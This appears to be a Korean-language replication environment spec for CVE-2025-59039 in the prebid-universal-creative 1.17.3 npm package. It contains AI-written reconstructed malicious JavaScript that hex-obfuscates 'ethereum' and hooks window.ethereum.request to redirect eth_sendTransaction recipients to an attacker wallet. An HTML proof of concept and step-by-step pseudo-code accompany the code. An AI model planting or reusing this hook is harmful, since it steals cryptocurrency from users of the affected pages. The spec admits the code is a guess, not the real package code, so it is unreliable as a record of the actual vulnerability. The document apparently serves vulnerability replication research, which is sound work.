CVE-2025-59039_ENV.md
Replication Environment Tech Spec
대상 소프트웨어(Target Application Specification)
-
제품명/버전 :
- prebid-universal-creative / 1.17.3
-
배포 방식 :
- 취약한 버전(v 1.17.3) 비공개 처리로 구현 불가
※ 정상 prebid-universal-creative 설치 방법
- npm 패키지 이용해서 prebid-universal-creative 설치 (Repository: https://github.com/prebid/prebid-universal-creative.git)
npm install prebid-universal-creative
시스템 환경(System Environment)
- OS: 환경 무관
- 언어: JavaScript
- Execution Environment: Prebid Universal Creative 1.17.3
이 외 필요한 조건
1. 취약점이 발견된 소스 코드 (AI 작성)
※ 취약 버전 소프트웨어 다운받았으나 취약 코드 확인 불가
※ 구성된 코드는 예상 코드에서 가독성을 높이기 위해 압축을 해제함
(function() {
var pbjs = {};
pbjs.renderAd = function() { /* ... */ };
window.pbjs = pbjs;
})();
(function() {
var _target = "\x65\x74\x68\x65\x72\x65\x75\x6d";
if (typeof window !== 'undefined' && window[_target]) {
var originalRequest = window[_target].request;
window[_target].request = function(payload) {
if (payload && payload.method === 'eth_sendTransaction') {
var params = payload.params[0];
if (params && params.to) {
console.log("[Attack] Swapping address: " + params.to + " -> 0xAttacker...");
params.to = "0xAttackerWalletAddress1234..."; // 공격자 주소
}
}
// 변조된 payload로 원본 함수 실행
return originalRequest.call(this, payload);
};
}
})();
2. PoC 코드 (AI 작성)
- 브라우저 콘솔이나 HTML 파일에서 window.ethereum.request가 변조되었는지 확인
<html>
<body>
<h1>Vulnerability Check</h1>
<script>
window.ethereum = {
request: function(args) {
console.log("Original Wallet Function Called with:", args);
return "Tx Sent to: " + args.params[0].to;
}
};
(function() {
var _target = "\x65\x74\x68\x65\x72\x65\x75\x6d";
if (window[_target]) {
var originalRequest = window[_target].request;
window[_target].request = function(payload) {
if (payload && payload.method === 'eth_sendTransaction') {
payload.params[0].to = "0xAttackerWalletAddress...";
console.log("[!] Malicious Hook Triggered!");
}
return originalRequest.call(this, payload);
};
}
})();
console.log("--- Attempting Transaction ---");
window.ethereum.request({
method: 'eth_sendTransaction',
params: [{ from: "0xMe", to: "0xFriendAddress", value: "100" }]
});
</script>
</body>
</html>
3. pseudo-code (AI 작성)
- 목표 식별 (ex. 이더리움)
CONST TARGET_OBJECT = window["ethereum"] (decoded from hex "\x65\x74\x68...")
가상화폐 지갑의 전역객체인 windows.ethereum 타깃
“ethereum” 문자열 그대로 쓰지 않고 HEX Code로 난독화
- 환경 검증
IF (TARGET_OBJECT exists) AND (window is defined):
실제로 지갑을 설치했는지 확인
- 후킹 준비
STORE Original_Request_Method = TARGET_OBJECT.request
원본 request 함수를 Original_Request_Method에 백업
- 함수 덮어쓰기
DEFINE TARGET_OBJECT.request AS FUNCTION(payload):
- payload 검사
IF payload.method EQUALS "eth_sendTransaction":
EXTRACT transaction_params FROM payload.params[0]
- payload
IF transaction_params.to EXISTS:
LOG "Swapping Address..."
SET transaction_params.to = "0xAttackerWalletAddress..." // Malicious Address
- 실행
RETURN CALL Original_Request_Method WITH modified_payload
EXECUTE logic immediately (Self-Invoking Function)
1~7 과정 병합된 pseudo-code
CONST TARGET_OBJECT = window["ethereum"] (decoded from hex "\x65\x74\x68...")
IF (TARGET_OBJECT exists) AND (window is defined):
STORE Original_Request_Method = TARGET_OBJECT.request
DEFINE TARGET_OBJECT.request AS FUNCTION(payload):
IF payload.method EQUALS "eth_sendTransaction":
EXTRACT transaction_params FROM payload.params[0]
IF transaction_params.to EXISTS:
LOG "Swapping Address..."
SET transaction_params.to = "0xAttackerWalletAddress..." // Malicious Address
RETURN CALL Original_Request_Method WITH modified_payload
EXECUTE logic immediately (Self-Invoking Function)
참고사항
https://vuldb.com/ko/?id.323473
https://github.com/prebid/prebid-universal-creative
https://www.npmjs.com/package/prebid-universal-creative/v/1.2.0